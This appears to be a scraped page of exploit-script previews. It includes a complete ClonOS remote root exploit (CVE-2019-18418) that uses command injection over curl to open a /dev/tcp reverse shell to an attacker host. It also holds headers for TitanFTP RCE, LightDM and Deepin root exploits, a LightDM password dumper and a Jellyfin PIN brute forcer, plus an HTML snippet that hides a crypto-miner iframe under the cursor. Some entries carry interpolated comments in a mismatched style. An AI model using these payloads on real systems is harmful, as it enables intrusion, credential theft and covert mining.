#!/bin/bash | |
# Detect PAM backdoors created by linux-pam-backdoor: | |
# https://github.com/zephrax/linux-pam-backdoor | |
# | |
# Note: this will likely only work with PAM version 1.3.0. | |
# --- | |
# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word | |
# Automatic PAM Backdoor | |
# PAM Version: 1.3.0 | |
# Password: some_s3cr3t_p455word |
#!/bin/bash | |
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE | |
# | |
# Requires remote administration interface to be enabled. (Default port 31001/tcp). | |
# Creates a new server and adds an event handler to execute a PowerShell reverse shell. | |
# --- | |
# $ ./titanftp-server-admin-event-handler-rce | |
# TitanFTP Server Administrator Event Handler Authenticated RCE | |
# | |
# Generating PowerShell reverse shell to 172.16.191.165:1337 ... |
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
# Target and callback endpoints are hardcoded below rather than read from
# arguments; the script takes no options.
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
# The entire exploit is this single POST to /json.php. For detection, the
# combination of mode=jailAdd with a backtick-wrapped command in
# form_data[jname] is the indicator to alert on in web server / proxy logs.
# Note: curl's exit status is not checked, so a failed request is silent.
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
#!/usr/bin/env ruby | |
################################################################################ | |
# Jellyfin Password Reset PIN Brute Force # | |
# # | |
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. # | |
# This will likely also work on Emby Media Server, but untested. # | |
# # | |
# Note: cURL must be installed and in $PATH # | |
# # | |
# Note: Upon successful exploitation, the password will be reset for all users, #
#!/bin/bash | |
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358) | |
# --- | |
# Usage: ./lightpwn | |
# A LightDM session is required. Exploitation will lock the current session, | |
# and could take several minutes. It usually takes about a minute. | |
# When the screen stops flashing, unlock the session and run: /bin/subash | |
# --- | |
# There's nothing new or special about this exploit. | |
# It's simply a slightly more weaponised version of the original PoC, |
#!/bin/bash | |
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit | |
# | |
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user | |
# in the sudo group to install arbitrary packages without providing a password, | |
# resulting in code execution as root. By default, the first user created on | |
# the system is a member of the sudo group. | |
# ~ bcoles | |
# | |
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/ |
#!/bin/bash | |
# lightdmdump | |
# --- | |
# Dump clear text passwords from lightdm sessions on Ubuntu | |
# Requires root privileges to dump lightdm process memory | |
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS | |
# --- | |
# Bug discovered by: Sven Blumenstein | |
# Disclosure date: 2017-09-15 | |
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490 |
#!/bin/bash | |
# List sub-domains using crt.sh | |
# Fail fast: abort on any unhandled non-zero status, on use of an unset
# variable, and on a failing stage anywhere in a pipeline.
set -o errexit
set -o nounset
set -o pipefail
# Word-split expansions only on newlines and tabs so spaces in values survive.
IFS=$'\n\t'
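#######################################
# Print an error message and abort the script.
# Diagnostics go to stderr so they are never mixed into the sub-domain list
# this script writes to stdout (the original wrote them to stdout via echo).
# Arguments: $* - message text
# Outputs:   "[ERROR] <message>" on stderr
# Returns:   does not return; exits the script with status 1
#######################################
error() {
  # printf with a fixed format: the message is data, never a format string,
  # and unlike echo it cannot misinterpret a leading "-n"/"-e".
  printf '[ERROR] %s\n' "$*" >&2
  exit 1
}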
#!/usr/bin/env ruby | |
################################################### | |
# ----------------------------------------------- # | |
# Fuzz Origami Ruby gem with mutated PDF files # | |
# ----------------------------------------------- # | |
# # | |
# Each test case is written to 'fuzz.pdf' in the # | |
# current working directory. # | |
# # | |
# Crashes and the associated backtrace are saved # |
<html> | |
<body> | |
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01"> | |
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe> | |
</div> | |
</body> | |
<script> | |
window.onmousemove = function(e) { | |
var container = document.getElementById("container"); |